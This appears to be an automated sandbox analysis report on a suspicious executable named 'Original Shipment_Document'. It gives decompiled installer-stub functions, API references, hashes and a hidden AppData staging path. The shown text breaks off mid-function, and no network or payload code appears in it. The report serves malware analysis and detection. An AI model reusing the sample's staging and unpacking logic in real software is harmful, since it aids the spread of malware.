                                                0x6eac18eb
                                                0x6eac18f0
                                                0x6eac18f7
                                                0x6eac18f7
                                                0x6eac18fd
                                                0x6eac18fe
                                                0x6eac1904
                                                0x6eac190a
                                                0x6eac1917
                                                0x6eac1918
                                                0x6eac191b
                                                0x6eac18af
                                                0x6eac18af
                                                0x6eac18b0
                                                0x6eac18c5
                                                0x6eac18c5
                                                0x6eac1929
                                                0x6eac192c
                                                0x6eac1939
                                                0x6eac1940
                                                0x6eac1948
                                                0x6eac194b
                                                0x6eac194b
                                                0x6eac1948
                                                0x6eac1958
                                                0x6eac1960
                                                0x6eac1965
                                                0x6eac1958
                                                0x6eac196d
                                                0x00000000
                                                0x6eac196f
                                                0x00000000
                                                0x6eac1970
                                                0x6eac196d
                                                0x6eac187a
                                                0x6eac187d
                                                0x6eac189b
                                                0x00000000
                                                0x00000000
                                                0x6eac189e
                                                0x6eac18a3
                                                0x6eac18a3
                                                0x6eac18a5
                                                0x00000000
                                                0x6eac18a5
                                                0x6eac187f
                                                0x6eac1880
                                                0x6eac1888
                                                0x6eac1889
                                                0x00000000
                                                0x6eac1889
                                                0x6eac1882
                                                0x6eac1883
                                                0x6eac1891
                                                0x00000000
                                                0x6eac1891
                                                0x6eac1886
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac1886

                                                APIs
                                                  • Part of subcall function 6EAC1BFF: GlobalFree.KERNEL32 ref: 6EAC1E74
                                                  • Part of subcall function 6EAC1BFF: GlobalFree.KERNEL32 ref: 6EAC1E79
                                                  • Part of subcall function 6EAC1BFF: GlobalFree.KERNEL32 ref: 6EAC1E7E
                                                • GlobalFree.KERNEL32 ref: 6EAC18C5
                                                • FreeLibrary.KERNEL32(?), ref: 6EAC194B
                                                • GlobalFree.KERNEL32 ref: 6EAC1970
                                                  • Part of subcall function 6EAC243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6EAC246F
                                                  • Part of subcall function 6EAC2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6EAC1896,00000000), ref: 6EAC28E0
                                                  • Part of subcall function 6EAC1666: wsprintfW.USER32 ref: 6EAC1694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 5418e771532f9a101bbc62e882d07ac88149ba4db16e842a72fb133855782473
                                                • Instruction ID: ce113a596634fecf6b3ef50b39b58251e47cba8e8630e98dcac6d82973f95463
                                                • Opcode Fuzzy Hash: 5418e771532f9a101bbc62e882d07ac88149ba4db16e842a72fb133855782473
                                                • Instruction Fuzzy Hash: 0241C471604701DBDF409FE4C988BE537BCAF15B18F0888B5E914AE086DB7484C9877B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1044 406026-406032 1045 406033-406067 GetTickCount GetTempFileNameW 1044->1045 1046 406076-406078 1045->1046 1047 406069-40606b 1045->1047 1049 406070-406073 1046->1049 1047->1045 1048 40606d 1047->1048 1048->1049
                                                C-Code - Quality: 100%
                                                			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                0x0040602c
                                                0x00406032
                                                0x00406033
                                                0x00406033
                                                0x00406038
                                                0x00406039
                                                0x0040603c
                                                0x00406041
                                                0x00406044
                                                0x0040604e
                                                0x0040605b
                                                0x0040605f
                                                0x00406067
                                                0x00000000
                                                0x00000000
                                                0x0040606b
                                                0x00000000
                                                0x0040606d
                                                0x0040606d
                                                0x0040606d
                                                0x00406070
                                                0x00406073
                                                0x00406073
                                                0x00406076
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00406044
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1968954121
                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E81(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E03(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AB5( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A38( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406507(L"C:\\Users\\hardz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\timelrer\\Tdlen",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x004022f1
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen
                                                • API String ID: 1892508949-3455914134
                                                • Opcode ID: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                                • Opcode Fuzzy Hash: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
                                                • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 99%
                                                			E00407033() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
